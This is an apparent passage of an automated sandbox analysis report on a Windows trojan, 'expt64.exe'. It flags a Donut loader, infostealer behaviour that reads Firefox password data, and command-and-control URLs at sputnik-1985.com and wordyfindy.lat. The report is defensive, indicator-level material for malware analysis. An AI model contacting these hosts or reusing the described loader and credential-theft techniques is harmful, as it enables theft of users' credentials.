              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
              Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.stC
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: expt64.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
              Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steamp
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
              Source: expt64.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
              Source: expt64.exe, 00000000.00000003.2517025375.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2516733335.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2519546371.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2568391413.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.000000000065A000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2580509230.0000000000685000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2583347735.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2583347735.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
              Source: expt64.exe, 00000000.00000002.2582315478.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2568391413.0000000000708000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2582372012.000000000070B000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.0000000000707000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2519546371.0000000000707000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2568391413.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2581461524.0000000000628000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2580979296.0000000000707000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2544998470.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
              Source: expt64.exe, 00000000.00000002.2581461524.0000000000628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api5;w
              Source: expt64.exe, 00000000.00000003.2517025375.0000000000707000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2519546371.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiing
              Source: expt64.exe, 00000000.00000003.2544998470.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apijOg
              Source: expt64.exe, 00000000.00000003.2544998470.00000000006FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/h
              Source: expt64.exe, 00000000.00000002.2582315478.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2583347735.00000000033EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/t
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
              Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized#
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: expt64.exe, 00000000.00000003.2481180004.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: expt64.exe, 00000000.00000003.2532897165.000000000384E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: expt64.exe, 00000000.00000003.2532897165.000000000384E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: expt64.exe, 00000000.00000002.2581461524.0000000000628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordyfindy.lat/apiM:
              Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptc
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: expt64.exe, 00000000.00000003.2532759529.000000000363C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: expt64.exe, 00000000.00000003.2532897165.000000000384E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.5iSPD7jwkDnW
              Source: expt64.exe, 00000000.00000003.2532897165.000000000384E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.3UfcDFx2ZSAZ
              Source: expt64.exe, 00000000.00000003.2532897165.000000000384E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: expt64.exe, 00000000.00000003.2532897165.000000000384E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.12:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49728 version: TLS 1.2

              System Summary

              barindex
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: expt64.exePE Siganture Subject Chain: CN="DivX, LLC", O="DivX, LLC", S=California, C=US, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=201810310435
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02342664 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_02342664
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_023426640_2_02342664
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F05AF0_2_022F05AF
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0231E2FC0_2_0231E2FC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022FC2DC0_2_022FC2DC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0230F32C0_2_0230F32C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F531C0_2_022F531C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0232D36C0_2_0232D36C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0233F36C0_2_0233F36C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0230B35C0_2_0230B35C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F735C0_2_022F735C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0232938C0_2_0232938C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_023003DC0_2_023003DC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F00000_2_022F0000
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_023210050_2_02321005
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F806C0_2_022F806C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0232D07C0_2_0232D07C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022FE04D0_2_022FE04D
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0231A0560_2_0231A056
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0232A0EC0_2_0232A0EC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_023030CC0_2_023030CC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0230D1550_2_0230D155
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_023311AC0_2_023311AC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F660C0_2_022F660C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_023096A60_2_023096A6
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_023026AF0_2_023026AF
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022FB69B0_2_022FB69B
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0231E6890_2_0231E689
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0232971C0_2_0232971C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0231D7A30_2_0231D7A3
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0230C7FC0_2_0230C7FC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0230F7EC0_2_0230F7EC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0230749E0_2_0230749E
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0230E4F00_2_0230E4F0
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_023174FB0_2_023174FB
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0233153C0_2_0233153C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_023005670_2_02300567
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_023305EC0_2_023305EC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02323ADC0_2_02323ADC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022FAB2C0_2_022FAB2C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02330B7C0_2_02330B7C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0233EB640_2_0233EB64
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02309B9C0_2_02309B9C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02328B9C0_2_02328B9C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0232CBFC0_2_0232CBFC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F7BDC0_2_022F7BDC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F781C0_2_022F781C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0232387C0_2_0232387C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0231D8670_2_0231D867
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0232A86C0_2_0232A86C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0232F8450_2_0232F845
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0231E88C0_2_0231E88C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_023278FF0_2_023278FF
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F48FC0_2_022F48FC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0231E2FC0_2_0231E2FC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0231D8C90_2_0231D8C9
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0231F91D0_2_0231F91D
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F8E3C0_2_022F8E3C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0233FE0C0_2_0233FE0C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02330E7C0_2_02330E7C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0231CEB80_2_0231CEB8
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02321E9C0_2_02321E9C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02307EC80_2_02307EC8
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0233EF340_2_0233EF34
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02300F550_2_02300F55
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02317F4C0_2_02317F4C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02327F950_2_02327F95
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02312F9C0_2_02312F9C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022FAF9C0_2_022FAF9C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02320C3D0_2_02320C3D
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0233DC700_2_0233DC70
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02301C730_2_02301C73
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F9CEC0_2_022F9CEC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F5CCC0_2_022F5CCC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02302DB60_2_02302DB6
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0230FDBC0_2_0230FDBC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02328DFC0_2_02328DFC
              Source: C:\Users\user\Desktop\expt64.exeCode function: String function: 023056FC appears 74 times
              Source: C:\Users\user\Desktop\expt64.exeCode function: String function: 022F99CC appears 75 times
              Source: expt64.exeStatic PE information: invalid certificate
              Source: expt64.exe, 00000000.00000000.2350832363.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs expt64.exe
              Source: expt64.exeBinary or memory string: OriginalFileName vs expt64.exe
              Source: expt64.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: expt64.exeBinary or memory string: g.vBP
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F0CBF CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_022F0CBF
              Source: C:\Users\user\Desktop\expt64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: expt64.exe, 00000000.00000003.2504340980.0000000003367000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2518312999.0000000003346000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2504984696.0000000003348000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: expt64.exeReversingLabs: Detection: 65%
              Source: expt64.exeVirustotal: Detection: 72%
              Source: expt64.exeString found in binary or memory: /LOADINF="filename"
              Source: C:\Users\user\Desktop\expt64.exeFile read: C:\Users\user\Desktop\expt64.exeJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: webio.dllJump to behavior
